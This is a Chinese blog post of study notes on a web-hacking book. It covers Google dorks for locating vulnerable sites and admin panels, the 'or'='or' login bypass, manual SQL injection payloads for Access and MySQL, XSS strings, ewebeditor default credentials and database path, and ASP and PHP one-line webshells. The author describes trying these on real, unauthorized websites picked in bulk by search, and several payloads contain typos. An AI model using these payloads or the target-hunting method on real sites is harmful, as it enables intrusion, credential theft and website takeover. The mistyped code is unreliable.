《精通腳本黑客》讀本書吧

《精通腳本黑客》

接全文的超鏈接

備注：

1、前有 ！ 代表不具備理解能力的詞語的解釋
2、xxxx ： 可以被替代的例子

第一章 本地服務器搭建

HTTP超文本傳輸協議
【 虛擬主機
Web服務器–
【 服務器托管

ASP 一種服務端腳本語言（位于服務器端的腳本運行環境）
ASP構建的網站，例http://www.xxx.com/article.asp?id=12

安裝IIS

第二章 常規腳本漏洞演練

2.1 Google Hack

1、google hack：結合google語法和一些關鍵字對網站進行滲透
Footprinting（踩點）收集的資訊：
（1）網站注冊資訊
（2）網管資料（網管：網路管理員）
（3）共享資料
（4）埠資訊
（5）FTP資源（FTP：檔案傳輸協議，在 網路 上進行檔案傳輸的一套標準協議）
（6）網站拓撲結構：一種物理布局，能表示出 網路服務器 、作業站的網路配置和互相之間的連接
（7）網站URL地址結構
(URL組成：資源型別、存放資源的主機域名、資源檔案名或者協議，主機，埠，路徑)
（8）網站系統版本
（9）后臺地址
（10）弱口令：容易被猜到或者被破解的指令

一、google hacking——google 的基本語法：

(被劃掉的指代關鍵字)
1、intext: 驗證碼 4800 => 用戶登錄口
2、intitle: 后臺管理 => 后臺管理
3、cache：pku,edu.cn => 北京大學網站服務器快取的內容
4、define : html => 查找定義
5、filetype: 檔案名.后綴名 => 查找特定檔案
6、info：關鍵字 => 基本資訊
7、 inurl：關鍵字 => 含有關鍵字的url地址
8、link：關鍵字 => 與關鍵字做了鏈接的url地址（查詢敏感資訊）
9、site：域名 => 拓撲結構進行，是從一個延展到剩下的所有相關
10、relate：URL => 與之相關聯的url，比如搜索清華會出現北大

其余不常用的關鍵字搜索：

二、google hacking——入侵

瀏覽器中輸入 site:網站url inurl:php?id= 找到存在xx網站存在php?id=的網站，再逐一驗證該網址是否存在注入漏洞，具體方法 在網址后面添加 and 1=1 和 and 1=2，如果兩個頁面顯示不同，即為存在注入漏洞，（但是這里試的時候不行，所有找的的網址進去之后都，“您進入的網頁不存在，即將回傳主頁”，我不理解，）

三、挖掘雞的使用

[后期實踐再補全這部分]

目錄瀏覽漏洞

原因：網站被目錄瀏覽，又可以搜索資料庫鏈接檔案，導致資料庫物理路徑泄露，
（！ 物理路徑：硬碟上的檔案路徑）

常見目錄瀏覽的網頁：To parent directory parent directory // Last modified Description // 轉到父目錄 // index of /

搜索目錄瀏覽的主要語法：inurl , intitle , intext , site , filetype
常見的檔案后綴：avi,bak,bmp,dll,exe,ini,mp3,rar,txt,wav,js,zip,chm

搜索特定的檔案夾

搜索協議 常見的協議：TCP , IP , DNS , TENET
(協議分析網：協議分析網)

搜索域名后綴 常見的域名后綴 : com , net , mil , org , info …

！ 肉雞：（傀儡機）可以被黑客遠程控制的機器，通常被用作DDOS攻擊，
！ DDOS ：（分布式拒絕服務）通過大規模互聯網流量淹沒目標服務器或其周邊基礎設施，以破壞目標服務器、服務或網路正常流量的惡意行為，

google hacking 常用陳述句:

google hack 部分結束 /// 撒花撒花

2.2 ‘or’ = ‘or’ 經典漏洞攻擊

1、‘or’='or’漏洞：主要出現在后臺登陸上，不需要密碼則可以進入后臺管理系統，

用戶名，密碼均為 ：'or'='or'（但我試了很多都受挫了，還有安全系統攔截我說不可以使用’or’='or’作為用戶名）
（ps：inurl:admin/login.asp真的很好用！）

2.3 暴庫漏洞攻擊

！ webshell臨時簡介：一個asp或php木馬后門，被放置到web目錄，且只會在網站的web日志中留下一些資料提交記錄，得到webshell后還有可能提高權限，

2.3.1 conn.asp暴庫法

目的：暴露出資料庫的絕對地址，

inurl:"conn.asp"搜索到具有暴庫漏洞的網站

然后下載資料庫，里面包含了被呼叫的資料庫的路徑及資料庫名and on

2.3.2 %5c暴庫法

方法：在網址的最后一個’ / ’改為‘%5c’
dbpath=server.mappath(‘資料庫地址’)
(將相對路徑改為絕對路徑)

2.4 cookies欺騙漏洞

cookie:一個文本檔案，存盤在本機，，隨著用戶請求和頁面在web服務器與瀏覽器之間傳遞，每次訪問網站的應用程式都會讀取cookie資訊，

花錢下載了桂林老兵，可以很方便的獲取到網站的cookie，從而進行修改，

md獲取不到，氣死我了，我的問題，我太菜了，后期再戰！（最主要上網也搜不到一個教程，無助了）

2.5 跨站漏洞（XSS）

原因：撰寫程式時對一些變數沒有做充分的過濾，直接把用戶提交的資料送到SQL陳述句里執行，導致用戶可以提交一些特意構造的陳述句 ，
利用跨站漏洞在JavaScript這種腳本代碼里面輸入惡意腳本代碼，被執行后就變成了跨站攻擊，

大多數存在于評論，互動多的網站，

2.5.1 一次跨站漏洞的發掘

1、查看網站結構，特別是那些會顯示到頁面上的用戶輸入資訊，
2、輸入跨站測驗代碼 <img src = javascript:alert("test")>進行測驗
3、成功 彈出對話框 ”test“

2.5.3 再次挖掘中國博客網之跨站漏洞

由于博客的登錄系統大改導致無法在博客網實踐，所以直接搜索了XSS的具體用法，

· 利用xss彈出惡意警示框：

<script> alert("xss惡意警示框！") </scirpt>

· 無限重繪網頁

<meta http-equiv="refresh" content="0;">`

剛剛翻博客看到了一句話，只能說，好樣的！

注入漏洞

工具注入

前提：能夠構造SQL陳述句來訪問資料庫，有資料和資料庫互動的地方會發生SQL注入攻擊，

【注入攻擊工具：明小子（但是tmd我花了很多的錢還是沒有下載到正確的程式，我真無語，）】

！ ASP：（動態服務器頁面）一個服務器端腳本環境，用來創建動態互動式網頁并建立強大的web應用程式，

簡述一下使用明小子攻擊的方法和程序吧還是（良心教程備份）

（無特定目標）
1、得到網站存在SQL注入的網址
2、利用Google hack技術批量搜索含有注入漏洞的網站inurl:asp:?id=
3、明小子操作

（存在特定目標）
1、利用google hack site:站點網址 inurl:asp:?id=
2、利用明小子操作

（工具注入待補充）

手動注入

access資料庫 為例

1、在asp:?id=xxx后加上‘，如果報錯則說明存在注入漏洞，下面是我的結果（很草，想罵人）

2、在網址后面輸入 and 1=1 and 1=2，如果回傳頁面不同，則說明存在注入漏洞，
3、判斷網站后臺資料庫的型別，
ACCESS資料庫 => 關鍵字 “Microsoft JET Database”
MSSQL => 關鍵字 “SQL Server”
4、（以ACCESS資料庫為例）猜測資料庫表名，在后面加上 and exists(select * from 表名) 或者 and exists(select count from 表名)

5、猜測列名，exists (select 列名 from 表名) 或者 exists(select count(列名) from 表名)

常見的表名為：

6、猜解列的長度，and (select top 1 len(列名) from 表名) >x => (變換x的值)
7、猜解列的內容（用戶名和密碼），and (select top 1 asc(mid(列名，列數N,1))from 表名)>x =>（top后的值是該列的第N行，x為ASCII碼，列數N就是在這一列中的第幾個數字）

MySQL資料庫為例

1、確認資料庫版本

and ord(mid(version(),1,1))>51/* 

（回傳正常說明是大于4.0的版本，報錯則說明是小于4.0的版本）
1、又確認資料庫版本 => /* !%20s*/ （回傳錯誤則說明后臺資料庫位MySQL/* !4016%20s */ 報錯說明不到該版本，
2、確定當前資料庫的欄位數目，（UNINON和order by）
2.1、UNINON(聯合查詢)：(要求前面的SQL陳述句1和后面的SQL陳述句2中的欄位數要相同)
2.2、order by：后加數字，提交的數字多則報錯，
3、union查詢來獲取資料庫表名

union select 欄位數 from 表名

(注：欄位數的書寫是1,2,3,…欄位數數目)

4、想獲得什么資訊就在某個欄位的位置上獲取，比如，

union select 1,version(),3,4,...

=> 資料庫當前版本就會出現在欄位2的位置；union select 1,2,username,4,… => 用戶名就會出現在欄位3的位置上，

union select 1,2,3,password,5,6,… from admin where id = 4 (這個數字是管理員的編號，是唯一的，)

！ MD5資訊摘要演算法：一種密碼散列函式，可以產生出一個128位（16位元組）的散列值（hash value），用于確保資訊傳輸完整一致，

！ load_file():讀取檔案并回傳檔案內容為字串，（資料庫權限必須為root：超級管理員）

讀取服務器內容：
1、判斷是否有root權限 =>

and ord(mid(user(),1,1))=114/*

=> 回傳正確則說明有root權限，錯誤則沒有，

2、判斷是否有讀寫檔案的權限

and(select count(*) from MySQL.user)>0

3、讀取資料庫內容

union select 1,load_file(檔案的十六位進制表示) from admin

2.7 檔案包含漏洞

構成遠程檔案包含漏洞原因：PHP檔案中的變數過濾不嚴，沒有判斷提交的引數是本地的還是遠程主機上的，
攻擊遠程檔案包含漏洞：指定遠程主機上的檔案作為引數來提交給變數執行，然后在檔案里寫入木馬，就會被web權限成功執行，

！ exploit:一個漏洞攻擊程式，利用它可以達到攻擊的目的，而獲得相應的權限，
! webshell：一種代碼執行環境，

2.8 旁注攻擊

旁注：利用同一主機上面不同網站的漏洞得到webshell，從而利用主機上的程式或者是服務所暴露的用戶所在的物理路徑進行入侵，

! ewebeditor : 在線HTML編輯器

利用ewebeditor去實作旁注攻擊
1、搜索使用ewebeditor的網站

ewebeditor inurl:admin_login.asp

2、使用原始用戶名和密碼登錄后臺，（原始用戶名：admin 原始密碼：admin或admin888）
3、如果不是原始用戶名或者密碼，則可以直接訪問db目錄下的資料庫（資料庫中會存在登錄用戶名和密碼）

db/ewebeditor.mdb

查詢域名

2.9 獲取webshell的幾種方法（這個跟書上不一樣啦，面向百度編程）

webshell：一種腳本攻擊工具，一個asp，php，jsp木馬后門，與正常網頁混在一起，使用web方式控制網站服務器，
webshell(個):一種環境，被用于網站管理，服務器管理等等，可以在線編輯網頁腳本，查看資料庫，執行任何程式命令，所以得到了webshell就相當于可以完全管理后臺，

！ php是服務器腳本語言；JSP是服務器端編程技術

2.9.1 直接上傳獲取webshell

php和jsp程式常見，上傳一個不會被過濾掉的asp程式，從而獲取webshell

2.9.2 添加修改上傳型別

asp會被過濾，asa或者asP可以添加，又或者是aaspsp，過濾了一個asp會顯露出剩下的asp，從而獲取webshell

2.9.3 利用后臺管理功能寫入webshell

在后臺修改組態檔，寫入后綴是asp檔案，

2.9.4 寫入過濾不完全（*）

！ 一句話木馬（分為服務端和客戶端）：一小段ASP代碼（服務端）插入到網站中，讓其可以在所要入侵的網站中執行，得到shell；然后讓客戶端（一個網頁，一些源代碼，通過篡改源代碼找到webshell）連接服務端，上傳一個大木馬，得到webshell，

%ASP一句話木馬：

ASP常見服務端：<%execute request("value")%>;<%execute request.form("value")%>;<%eval request("value")%>;<%On Error Resume Next execute request("value")%>.

Attention：
1、action的值是插入服務端代碼的ASP檔案的URL地址，
2、IP.writetext request(“value”)中的value和服務端的value相同，
3、客戶端（大樣）

把服務端插入到ASP檔案中：
1、利用后臺提供的功能（可以輸入資料的地方）插入服務器，（友情連接，頁面編輯，模塊編輯）【要記住輸入資料檔案的URL地址】
2、通過暴庫（或）得到網站資料庫的絕對路徑，（暴出的資料庫必須以asp結尾）

%PHP一句話木馬

服務端：<?request($_REQUEST['a']);?>;<?require($a);?>;<?@include(#_POST["a"]);?>

服務端插入到網站php檔案中：
1、利用后臺可以輸入的的功能，
2、利用php網站中使用的文本資料庫（資料庫檔案后綴為php），

2.10 使用webshell及提升權限

2.10.1 webshell的基本使用方法

! FSO:檔案系統物件，

2.10.2 webshell的提權

插入很長的一篇內容

一些漏洞的名稱

1、A1-Injection / ==> 注入漏洞
2、HTML Injection - Reflected （GET ==> HTML注入GET請求
3、HTML Injection - Stored（Blog）

后續更新

未完待續，后期看心情補，